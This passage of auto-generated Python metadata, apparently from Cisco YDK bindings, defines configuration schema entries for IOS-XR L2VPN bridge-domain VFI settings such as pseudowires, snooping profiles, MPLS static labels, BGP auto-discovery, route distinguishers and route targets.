'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
_MetaInfoClassMember('transport', REFERENCE_LIST, 'Transport' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
[], [],
''' Multicast P2MP Transport Type
''',
'transport',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transports',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
False,
[
_MetaInfoClassMember('signaling-name', ATTRIBUTE, 'str' , None, None,
[], ['(BGP)'],
''' Signaling Type
''',
'signaling_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
False,
[
_MetaInfoClassMember('signaling', REFERENCE_LIST, 'Signaling' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling',
[], [],
''' Multicast P2MP Signaling Type
''',
'signaling',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signalings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery P2MP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signalings', REFERENCE_CLASS, 'Signalings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings',
[], [],
''' Multicast P2MP Signaling Type
''',
'signalings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transports', REFERENCE_CLASS, 'Transports' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
[], [],
''' Multicast P2MP Transport
''',
'transports',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'multicast-p2mp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
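        # Per-pseudowire sub-entries for a VFI pseudowire: DHCP snooping profile
        # attachment, MPLS static labels (local and remote both constrained to
        # 16..1048575), and a static MAC table keyed by an aa:bb:cc:dd:ee:ff pattern.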
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-dhcp-snoop',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
False,
[
_MetaInfoClassMember('pseudowire-static-mac-address', REFERENCE_LIST, 'PseudowireStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'pseudowire_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
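        # Aggregate 'vfi-pseudowire' entry: keyed by neighbor IPv4 address plus a
        # pseudowire-id in 1..4294967295; its remaining members reference the
        # sub-containers above and attach PW-class, IGMP, and MLD snooping profiles.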
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-static-mac-addresses', REFERENCE_CLASS, 'PseudowireStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'pseudowire_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'vfi_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-dhcp-snoop', REFERENCE_CLASS, 'VfiPwDhcpSnoop' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop',
[], [],
''' Attach a DHCP Snooping profile
''',
'vfi_pw_dhcp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an IGMP Snooping profile
''',
'vfi_pw_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an MLD Snooping profile
''',
'vfi_pw_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pw-mpls-static-labels', REFERENCE_CLASS, 'VfiPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'vfi_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
False,
[
_MetaInfoClassMember('vfi-pseudowire', REFERENCE_LIST, 'VfiPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire',
[], [],
''' Pseudowire configuration
''',
'vfi_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
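        # BGP auto-discovery subtree for the VFI: the entries that follow cover the
        # VPLS-ID, flow-label load balancing, route distinguisher and route targets,
        # and the LDP/BGP signaling-protocol settings.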
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address-index', ATTRIBUTE, 'int' , None, None,
[('0', '32767')], [],
''' Address index
''',
'address_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
                ''' Two-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS index
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'LdpVplsIdEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LdpVplsIdEnum',
[], [],
''' VPLS-ID Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vplsid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
                ''' Enable LDP as Signaling Protocol.
                Deletion of this object also causes
                deletion of all objects under
                LDPSignalingProtocol.
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vplsid', REFERENCE_CLASS, 'Vplsid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid',
[], [],
''' VPLS ID
''',
'vplsid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ldp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
False,
[
_MetaInfoClassMember('export', ATTRIBUTE, 'str' , None, None,
[], [],
''' Export route policy
''',
'export',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-route-policy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
                ''' Route Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable BGP as Signaling Protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ve-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Virtual Edge Block Configurable
Range
''',
've_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('veid', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Virtual Edge Identifier
''',
'veid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
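        # Route-target entries: each 'route-target' is keyed by format and role,
        # and carries its value through one of two keyed child lists, either
        # AS:index (two- or four-byte AS) or IPv4-address:index.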
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
False,
[
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
                ''' Two-byte or four-byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'two-byte-as-or-four-byte-as',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
                ''' Role of the route target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
